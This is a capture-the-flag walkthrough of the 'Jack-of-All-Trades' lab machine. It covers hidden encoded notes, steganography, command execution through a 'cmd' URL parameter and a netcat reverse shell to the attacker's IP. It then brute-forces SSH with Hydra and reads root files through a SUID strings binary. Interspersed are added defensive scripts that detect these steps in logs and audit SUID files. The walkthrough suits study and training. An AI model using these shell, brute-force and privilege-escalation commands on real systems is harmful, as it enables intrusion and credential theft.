
Jack-of-All-Trades






First of all, this write-up is quite long, so be patient and stay tuned because it's a fun box and you may
learn something new. Take your notes and let's jump into this machine.

Starting with enumeration, we're gonna use Nmap to see what ports and services are running.



As we can see there is a web service and SSH, but both of them are running on unusual ports, so keep that in mind.
Let's go to the website and check it out, but first we need to allow Firefox to load HTTP on port 22 (it blocks that port by default). Follow these steps:

1- Select and copy the following preference name

network.security.ports.banned.override

2- In a new tab, type or paste about:config in the address bar and press Enter/Return. Click the button promising to be careful.

3- In the search box above the list, type or paste ports and pause while the list is filtered

If the above-listed preference exists:

4- Double-click it and add a comma to the end of the list followed by the port number you need to allow. No spaces. Then click OK.

If the above-listed preference does not exist:

5- Right-click anywhere on the page and choose New > String

6- In the preference name dialog, paste the name you copied and click OK.

7- In the preference value dialog, type in the port number you need to allow, then click OK.

After applying these steps, go and open the URL http://machine-IP:22



Now we've got a webpage. Let's view its source and see if something is hidden.



As we can see there is a note that refers to a hidden page /recovery.php and an encoded string that we need to decode.

Let's decode it first. It looks like base64, so you can use online tools or your terminal.

The decoded note was:

Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! 
Also gotta remember your password: you-ganna-found-password-here

We also have a name, so let's search for it.



So we've found a Twitter account. Take a look at his tweets, because he describes the exact encoding methodology.

Now let's visit that page /recovery.php



It requires a username and password. Let's take a look at the page source.



There is another encoded string. Let's decode it with the methodology that Johny Graves tweets.
The decoded note was:

Remember that the credentials to the recovery login are hidden on the homepage! 
I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S
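Both notes on this box are layered encodings rather than hashes, so they can be unwrapped mechanically instead of "cracked". The script below is an added example (not code from the original post) that peels hex, base32 and base64 layers off a string until none applies and then tries rot13 only if it makes the text read more like English. The exact chain from Johny Graves' tweets is not stated above, so the `wrap()` helper builds a constructed sample chain (rot13, then base32, then hex) purely to have something to decode; the common-word list is also a small constructed one.

```python
import base64
import binascii
import codecs
import re
import string

# Words common enough to tell readable English from rot13 gibberish
# (a small constructed list; extend it for your own notes).
COMMON_WORDS = {"the", "to", "is", "are", "on", "and", "you", "your",
                "password", "remember", "login", "hidden"}


def printable_text(data: bytes):
    """Return the decoded text if `data` is printable UTF-8, else None."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if text and all(ch in string.printable for ch in text):
        return text
    return None


def try_hex(s: str):
    t = s.strip()
    if len(t) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", t):
        return None
    return printable_text(bytes.fromhex(t))


def try_base32(s: str):
    t = s.strip()
    if len(t) % 8 or not re.fullmatch(r"[A-Z2-7]+=*", t):
        return None
    try:
        return printable_text(base64.b32decode(t))
    except (binascii.Error, ValueError):
        return None


def try_base64(s: str):
    t = s.strip()
    if len(t) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", t):
        return None
    try:
        return printable_text(base64.b64decode(t, validate=True))
    except (binascii.Error, ValueError):
        return None


def english_score(s: str) -> int:
    return sum(1 for w in re.findall(r"[a-z]+", s.lower()) if w in COMMON_WORDS)


def rot13(s: str) -> str:
    return codecs.encode(s, "rot_13")


# Strictest decoder first: hex only accepts [0-9a-f], base32 only [A-Z2-7].
DECODERS = [("hex", try_hex), ("base32", try_base32), ("base64", try_base64)]


def unwrap(blob: str):
    """Peel encoding layers off `blob` until none applies.

    Returns (plaintext, [layer names in the order they were removed]).
    rot13 is tried last and only if it improves the English score,
    because any text is a "valid" rot13 input.
    """
    steps = []
    text = blob
    while True:
        for name, decoder in DECODERS:
            result = decoder(text)
            if result is not None:
                steps.append(name)
                text = result
                break
        else:
            break
    if english_score(rot13(text)) > english_score(text):
        steps.append("rot13")
        text = rot13(text)
    return text, steps


def wrap(plain: str) -> str:
    """Constructed sample chain rot13 -> base32 -> hex, for demonstration only."""
    b32 = base64.b32encode(rot13(plain).encode()).decode()
    return b32.encode().hex()


if __name__ == "__main__":
    note = "Remember: the credentials are on the homepage"
    print(unwrap(wrap(note)))
```

Each decoder is strict about its alphabet and padding and only accepts a layer whose output is printable text, which is what stops a base32 string from being mis-decoded as base64 (the two alphabets overlap) and stops random bytes from being reported as a result.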

Let's visit that link.



I didn't know exactly what this is, but I think he is referring to the dinosaur image on the home page,
so let's save it. You can save it directly, or go to /assets where you'll find all the pictures used on the home page.

The first one is called stego.jpg, so from its name I think he is hinting at steghide.

use: steghide extract -sf stego.jpg 

This will extract the hidden data, but you'll be asked for a passphrase. It's the password we found in the first note,
the one that was base64-encoded.



As you can see we got a funny message saying that this isn't the one xD
So let's try the second one, header.jpg




Yes, this is it. You now have a username and password, and we're gonna use them on the recovery page we found, so let's do it.



There is a message saying:
GET me a 'cmd' and I'll run it for you Future-Jack.
I think he writes GET in upper case to refer to the GET method, so we're gonna pass it in the URL, and he also mentions cmd. This technique is not new;
there are payloads on your Kali machine that use the same method. So let's add a cmd parameter, give it a command and see what happens.

use: http://machine-IP:22/nnxhweOV/index.php?cmd=ls



As we can see we now have RCE and were able to list the directory, so I'll use a one-line Netcat reverse shell.
First, set up your Netcat listener:

use: nc -nvlp 4444

Second, use this payload in the cmd parameter:

use: nc -e /bin/sh your-machine-IP 4444
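From the defender's side, everything above leaves a clear trail in the web server's access log: a request to an odd path with a `cmd` query parameter, first with a harmless `ls`, then with a netcat reverse shell. The script below is an added example (not code from the original post) that scans combined-format access log lines for command-injection style requests. The log lines are constructed for this write-up; the parameter names and shell patterns are an assumed starting list, not a complete one.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access log lines mirroring this box: ordinary browsing, then the
# two index.php?cmd= requests from the walkthrough (values are percent-encoded
# as a browser would send them).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1043
10.0.0.5 - - [10/Mar/2024:12:00:09 +0000] "GET /assets/header.jpg HTTP/1.1" 200 55012
10.0.0.5 - - [10/Mar/2024:12:01:13 +0000] "GET /nnxhweOV/index.php?cmd=ls HTTP/1.1" 200 312
10.0.0.5 - - [10/Mar/2024:12:01:40 +0000] "GET /nnxhweOV/index.php?cmd=nc%20-e%20/bin/sh%2010.0.0.5%204444 HTTP/1.1" 200 0
10.0.0.7 - - [10/Mar/2024:12:02:00 +0000] "GET /search.php?q=dinosaur HTTP/1.1" 200 2210
""".splitlines()

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Parameter names that web shells and command-injection probes commonly use
# (assumed starting list).
SUSPECT_PARAMS = {"cmd", "exec", "command", "system"}

# Decoded parameter values that look like shell rather than user input.
SHELL_PATTERNS = [
    re.compile(r"\bnc\b.*\s-e\b"),     # netcat with -e (reverse shell)
    re.compile(r"/bin/(?:ba)?sh\b"),   # explicit shell interpreter
    re.compile(r"[;|&`]|\$\("),        # command separators / substitution
    re.compile(r"\b(?:wget|curl)\b"),  # staged download
]


def analyze_line(line: str):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # parse_qsl percent-decodes the values, so %20 becomes a space here
    params = parse_qsl(url.query, keep_blank_values=True)
    reasons = []
    for name, value in params:
        if name.lower() in SUSPECT_PARAMS:
            reasons.append(f"suspect parameter {name!r}")
        for pattern in SHELL_PATTERNS:
            if pattern.search(value):
                reasons.append(f"shell pattern {pattern.pattern!r} in {name!r}")
                break
    if not reasons:
        return None
    return {"ip": m["ip"], "time": m["ts"], "path": url.path,
            "params": params, "reasons": reasons}


def scan(lines):
    """Run analyze_line over every log line and keep the findings."""
    return [f for f in map(analyze_line, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["time"], finding["ip"], finding["path"], finding["reasons"])
```

Note that the `ls` request is flagged on the parameter name alone, while the reverse shell trips both the name check and a shell pattern. A real deployment would add POST bodies and a rule for responses whose size is 0 right after such a request, which is what a backgrounded reverse shell tends to look like.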


*Pro tip: if you wanna upgrade the Netcat shell to a proper interactive shell, just use this:

/usr/bin/script -qc /bin/bash /dev/null

And now we've got our shell.
If we navigate to /home you'll find jack's home directory. You can't access it, but you will see an interesting file
called jacks_password_list



Cat it, copy the list and save it on your machine as a txt file, because you're gonna use Hydra to brute force SSH.



use: hydra -l jack -P jack-passwords-list-path -s 80 ssh://machine-IP

-s 80 tells Hydra that SSH is running on port 80 instead of 22. Go ahead and run this and you'll get jack's password.
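Moving SSH to port 80 doesn't hide a Hydra run from the host itself: sshd still writes one "Failed password" line per attempt to the auth log, followed by an "Accepted password" line when the wordlist hits. The script below is an added example (not code from the original post) that parses those lines and alerts on a burst of failures per source and user, and separately on a success that follows such a burst. The log lines are constructed; the year passed to the parser is assumed because syslog timestamps carry none, and the `port` field in these lines is the client's source port, not sshd's listening port.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd auth log lines: a fast run of failures from one source for
# user jack, then a success from the same source, plus one legitimate typo
# from a second host that must not alert.
SAMPLE_AUTH = """\
Mar 10 12:05:01 jack sshd[1201]: Failed password for jack from 10.0.0.5 port 51522 ssh2
Mar 10 12:05:01 jack sshd[1202]: Failed password for jack from 10.0.0.5 port 51524 ssh2
Mar 10 12:05:02 jack sshd[1203]: Failed password for jack from 10.0.0.5 port 51526 ssh2
Mar 10 12:05:02 jack sshd[1204]: Failed password for jack from 10.0.0.5 port 51528 ssh2
Mar 10 12:05:03 jack sshd[1205]: Failed password for jack from 10.0.0.5 port 51530 ssh2
Mar 10 12:05:03 jack sshd[1206]: Failed password for jack from 10.0.0.5 port 51532 ssh2
Mar 10 12:05:04 jack sshd[1207]: Accepted password for jack from 10.0.0.5 port 51534 ssh2
Mar 10 12:06:10 jack sshd[1220]: Failed password for jack from 10.0.0.9 port 40010 ssh2
Mar 10 12:06:15 jack sshd[1221]: Accepted password for jack from 10.0.0.9 port 40012 ssh2
""".splitlines()

AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_event(line: str, year: int = 2024):
    """Parse one sshd line into (timestamp, result, user, ip), or None.

    Syslog lines carry no year, so `year` is an assumption supplied by the caller.
    """
    m = AUTH_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{m['ts']} {year}", "%b %d %H:%M:%S %Y")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)):
    """Alert once when a (ip, user) pair reaches `threshold` failures inside
    `window`, and again if a success from that pair follows the burst."""
    recent = defaultdict(list)  # (ip, user) -> failure timestamps in window
    alerts = []
    for event in filter(None, map(parse_event, lines)):
        ts, result, user, ip = event
        key = (ip, user)
        recent[key] = [t for t in recent[key] if ts - t <= window]
        if result == "Failed":
            recent[key].append(ts)
            if len(recent[key]) == threshold:
                alerts.append(("burst", ip, user, ts))
        elif len(recent[key]) >= threshold:
            alerts.append(("success_after_burst", ip, user, ts))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH):
        print(*alert)
```

The second alert type is the one worth paging on: a burst alone may be a scanner, but a success right after it means the password list contained a valid credential, which on this box is exactly what the leaked jacks_password_list file made possible.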



After logging in, you'll see only one picture in jack's home. Go ahead and download it;
you can download anything over SSH using SCP:

use: scp user.jpg your-username@your-machine-IP:/your-dir


You'll be asked for your local SSH password.

After downloading it, just open it; don't try to do what I did, "trying to extract data from it xD".
You'll find the user flag!



user flag Done! ✌

Now time for the root flag.

use: sudo -l 



Looks like jack can't run any sudo command! So let's find out what SUID executables we can find:

use: find / -type f -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null



As we can see, strings is SUID root, so we can run strings as root!
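The same `find` is how a sysadmin should audit a host before an attacker does: list every SUID-root file and compare it against the set a stock install is expected to have, so an oddity like a SUID `strings` stands out. The script below is an added example (not code from the original post) that does that audit in Python. The baseline set is an assumed starting list for a generic Linux install, not authoritative for any distribution; `demo()` builds a throwaway directory tree mirroring this box (a normal passwd, a SUID strings, a non-SUID ls) so the audit can be run without touching the real filesystem.

```python
import os
import stat
import tempfile
from pathlib import Path

# SUID-root binaries a stock Linux install is expected to carry. This is an
# assumed starting baseline; build the real one from a known-good host of the
# same distribution and version.
BASELINE_SUID = {
    "passwd", "sudo", "su", "mount", "umount", "ping", "chsh", "chfn",
    "gpasswd", "newgrp", "fusermount", "pkexec",
}


def find_suid(root: str = "/", owner_uid=0):
    """Return sorted paths of regular files under `root` with the setuid bit set.

    `owner_uid=0` restricts the search to root-owned files, matching the
    find ... -user root -perm -4000 command above; pass None to report every
    owner. Symlinks are not followed and unreadable directories are skipped.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            hits.append(path)
    return sorted(hits)


def unexpected_suid(paths, baseline=BASELINE_SUID):
    """Keep only SUID files whose basename is not in the baseline."""
    return [p for p in paths if os.path.basename(p) not in baseline]


def demo():
    """Audit a constructed tree; returns (all SUID basenames, unexpected ones)."""
    with tempfile.TemporaryDirectory() as tmp:
        bin_dir = Path(tmp, "bin")
        bin_dir.mkdir()
        for name, mode in [("passwd", 0o4755), ("strings", 0o4755), ("ls", 0o755)]:
            target = bin_dir / name
            target.write_bytes(b"#!/bin/sh\n")
            target.chmod(mode)
        # The files here are owned by whoever runs the demo, not root, so the
        # owner filter is switched off for the demonstration.
        found = find_suid(tmp, owner_uid=None)
        return ([os.path.basename(p) for p in found],
                [os.path.basename(p) for p in unexpected_suid(found)])


if __name__ == "__main__":
    print(demo())
```

On a real host run `find_suid()` with the defaults and diff the result against the baseline captured at build time; anything new, or anything removed, is worth a ticket, since a SUID bit on a general-purpose tool like strings is a read-as-root primitive, exactly as the rest of this walkthrough shows.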

So let's do it:

use: strings /root/root.txt 

 

that's it Jack-of-All-Trades rooted! ✌

I hope you enjoyed this fun machine see you in another one.


  








